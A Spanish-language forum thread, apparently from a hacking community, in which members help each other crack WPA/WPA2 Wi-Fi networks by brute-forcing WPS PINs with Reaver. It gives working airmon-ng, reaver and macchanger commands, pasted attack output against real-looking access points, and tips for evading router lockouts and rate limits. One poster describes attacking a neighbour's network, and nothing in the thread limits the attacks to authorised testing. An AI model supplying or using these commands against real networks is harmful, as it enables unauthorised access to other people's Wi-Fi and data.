Crackear Redes WPA/WPA2 sin diccionarios con REAVER

Iniciado por Stiuvert, Enero 10, 2016, 08:44:58 AM

Tema anterior - Siguiente tema

0 Miembros y 5 Visitantes están viendo este tema.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola,

Es uno por vez.

Saludos,
ANTRAX
Vale, muchas gracias.
Saludos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
hola, muchas gracias por tu aporte.
sabes, tengo un problema.
todo los comandos funcionan bien, pero cuando llego ejecutar reaver me arroja el siguiente error que dejare adjunto en la  imagen
agradecería mucho la ayuda.

Trabajo con la maquina virtual vmware.

si necesitan algun otro dato me lo señalan por favor, de antemano gracias.



Saludos,

Hermano, ese no es problema de reaver, es asunto de los repositorios... actualiza desde aquí No tienes permitido ver los links. Registrarse o Entrar a mi cuenta... Tenía el mismo problema hasta que actualicé. Espero te sirva, saludos(:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
hola, muchas gracias por tu aporte.
sabes, tengo un problema.
todo los comandos funcionan bien, pero cuando llego ejecutar reaver me arroja el siguiente error que dejare adjunto en la  imagen
agradecería mucho la ayuda.

Trabajo con la maquina virtual vmware.

si necesitan algun otro dato me lo señalan por favor, de antemano gracias.



Saludos,

Hermano, ese no es problema de reaver, es asunto de los repositorios... actualiza desde aquí No tienes permitido ver los links. Registrarse o Entrar a mi cuenta... Tenía el mismo problema hasta que actualicé. Espero te sirva, saludos(:

Gracias amigo, voy a probar y te cuento.

Saludos,  ;D
""El problema más grave no es que se le llame delincuente a un hacker, sino, y por el contrario, que se le llame hacker a un delincuente""

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola, buen aporte.
Me surgió una duda: ¿Puedo utilizar reaver sobre varios APs simultaneamente o se produce algún tipo de conflicto?
Saludos

Para usar reaver necesitamos crear una interfaz en modo monitor, y para eso hacemos:

Código: php
sudo airmon-ng start <nombre_de_interfaz>


y luego en el comando:

Código: php
Reaver –i mon0 –b A4:52:6F:E2:4D:56 –VV

con la opcion -i marcamos con cual interfaz queremos hechar a andar el ataque, la idea para hacer lo que quieres es la siguiente:

1.- Crea mas interfaces en modo "monitor" (tantas como AP quieras atacar).
2.- Luego con el programa "macchanger" cambia las direcciones MAC de las interfaces que hayas creado asi:

Código: php
root@cl0udswx-lab:/home/cl0udswx# macchanger -a mon0


Y conseguiras esto:

Código: php
Current MAC:   70:1a:04:f0:30:97 (Liteon Tech Corp.)
Permanent MAC: 70:1a:04:f0:30:97 (Liteon Tech Corp.)
New MAC:       00:0e:6d:d8:6f:7f (Murata Manufacturing Co., Ltd.)


Y de esta forma podrias crear varias instancias de reaver para distintos AP, el asunto es que el rendimiento bajara considerablemente ya que las interfaces en modo monitor podria decirse que son interfaces virtuales, pero que a nivel de hardware comparten el mismo recurso.

Saludos.


El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Hola a todo el mundo eres  una máquina @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta me encata siempre leerte porque siempre me llevo algo de tus threads bueno me dejo el tema  nostágico y sólo quiero haceros un pequeñito inciso.

Este pequeño inciso es que la gran mayoría de los firewall de los routers actuales trabajan satisfactoriamente y cortan los ataques de reaver lo digo para  evitar pérdidas de tiempo y calentaderos de materia encefálica.

Hugs brothers

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hola! Tengo un problema, hago todos los pasos a la perfeccion y la terminal se me queda en esto:

  • Waiting for beacon from xx:xx:xx:xx:xx:xx
  • Associated with xx:xx:xx:xx:xx:xx (ESSID: xxxxxxxxxx)
  • Starting Cracking Session. Pin count: 0, Max pin attempts: 11000

    Necesito ayuda! Si alguien puede decirme que hacer seria genial, saludos y gracias.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola! Tengo un problema, hago todos los pasos a la perfeccion y la terminal se me queda en esto:

  • Waiting for beacon from xx:xx:xx:xx:xx:xx
  • Associated with xx:xx:xx:xx:xx:xx (ESSID: xxxxxxxxxx)
  • Starting Cracking Session. Pin count: 0, Max pin attempts: 11000

    Necesito ayuda! Si alguien puede decirme que hacer seria genial, saludos y gracias.
Como lanzas Reaver? (comparte el comando o una captura de pantalla)
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Hola amigo primero que todo gracias por compartir tus conocimientos!es de mucha ayuda para aquellos que tenemos menos experiencia :) quiero resaltar un problema que me da a la hora de realizar eso y me dice es esto "wps transaction failed (code 0x03) re-trying last pin" lo he dejado toda la noche ese ha sido el mensaje que casi toda la terminal

 jerome podrias abrir varias terminales y probar tu mismo, lanzarlo a varias redes, no creo que te de problema

cristobal92 puede ser que la red a la cual estas intentando lanzar el ataque esta muy lejos!!!
y es por eso que no logra asociarse, te recomiendo una que esta un poco mas cerca

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¿Puedo utilizar reaver sobre varios APs simultaneamente o se produce algún tipo de conflicto?
No se puede asociar una tarjeta a dos APs a la vez.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Saludos, muy buen tutorial, bien detallado. Ahora tengo unas dudas y quisiera saber si me pueden ayudar a despejar dudas.

¿El Channel de la red a atacar no debe ser usado dentro del mismo comando al realizar el ataque?

Ya que estás aputando el ataque a la BSSID pero no colocas el Channel de la misma en la linea de comando ¿Habrá algún error si no está declarado el Channel?

Código: php
Reaver –i mon0 –b A4:52:6F:E2:4D:56 –VV


------------------------------------

Lo otro es que en otro post acá en el foro logré leer que algunos Router están incluyendo dentro de su seguridad un bloqueo del WPS para cuando hay mas de 6 intentos errados de ingreso, ¿esto es cierto? ¿como saber a cual router debo apuntar para que sea mas exitoso el ataque adicional a la opción de tener WPS activo?.

Agradezco de antemano a quienes me puedan despejar las dudas.

Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No es necesario especificar el canal pero siempre puedes ponerlo junto al BSSID.

Por otro lado, si el router bloquea las peticiones WPS puedes modificar el tiempo de intentos:

Código: bash
reaver -i mon0 -b 00:11:22:33:44:56 -vv -d 20


Saludos

Esto que aparece es el intento por fuerza bruta que intenta realizar la herramienta Reaver?
Pregunto ya que no la conozco y no hay imagen del procedimiento, para saber si está corriendo bien o me equivoqué en algo. Gracias.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Esto que aparece es el intento por fuerza bruta que intenta realizar la herramienta Reaver?
Pregunto ya que no la conozco y no hay imagen del procedimiento, para saber si está corriendo bien o me equivoqué en algo. Gracias.

Te está dando un error, probablemente el router ha bloqueado tus peticiones.

Saludos

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy bueno @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta escribió uno muy detallado que complementa muy bien este que compartes, si no les importa los uniré ambos en solo mega aporte.

Saludos.


Enviado desde mi iPhone utilizando Tapatalk


Muy buenas, donde puedo ver dicho mega aporte plis??
Gracias!!

Muy buenas amigos!!
Me sale el siguiente fallo en todas las q intento sacar, es el siguiente:
- "WARNING: Detected AP rate limiting, waiting 60 seconds before re-cheking"
Y este mensaje es el q sale siempre. A q se debe esto??
Gracias x vuestra ayuda!!

@Kr-dell Esto es porque el router WIFI bloquea el ataque y dice que espera 60 segundos. es como los celulares, cuando un celular está bloqueado tienes 3 intento de desbloqueo y después de los 3 intento fallido tienes 60 segundo de espera y si fallas nuevamente son 120 segundos, bueno esto es casi lo mismo si el router detecta arto pines de incorrecto se bloquea por un cierto X tiempo. Esto depende del fabricante del router porque no todos tiene el mismo tiempo de desbloqueo alguno duran 3 días o semanas. un caso mío la wifi de un vecino era 3 pines y se bloqueaba por cada 1 hora por eso existe la opción -l en reaver que quiere decir esta opción que yo inyecto pin por cada cierto segundo ósea si pongo -l 3600 (3600 son 1 hora en segundos) va inyectar 1 o 2 o 3.... 10 pin por cada 1 hora es tedioso, pero es lo que hay. Existen ataque para evitar esto como por ejemplo atacar el router que se reinicie algo por el estilo para que se te desbloque.

Te dejo un video ojala que te sirva



Saludos.





Abril 08, 2019, 03:55:52 PM #39 Ultima modificación: Abril 09, 2019, 11:11:20 AM por Gabriela
Buenas, me estreno por aqui  ;D cada vez que intento acceder a alguna red siempre me sale lo mismo... puede ser que el router me este bloqueando y me desconecte o estoy haciendo algo mal?

  • Waiting for beacon from A4:08:F5:E2:14:96
  • Switching wlan1mon to channel 1
  • Received beacon from A4:08:F5:E2:14:96
  • Vendor: Broadcom
  • Trying pin "12345670"
  • Sending authentication request
  • Sending association request
  • Associated with A4:08:F5:E2:14:96 (ESSID: vodafone1490)
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received identity request
  • Sending identity response
  • Received identity request
  • Sending identity response
  • Received identity request
  • Sending identity response
  • Received identity request
  • Sending identity response
  • Received identity request
  • Sending identity response
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M1 message
  • Sending WSC NACK
  • Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
  • Trying pin "12345670"
  • Sending authentication request


    Siempre repite el mismo PIN 12345670..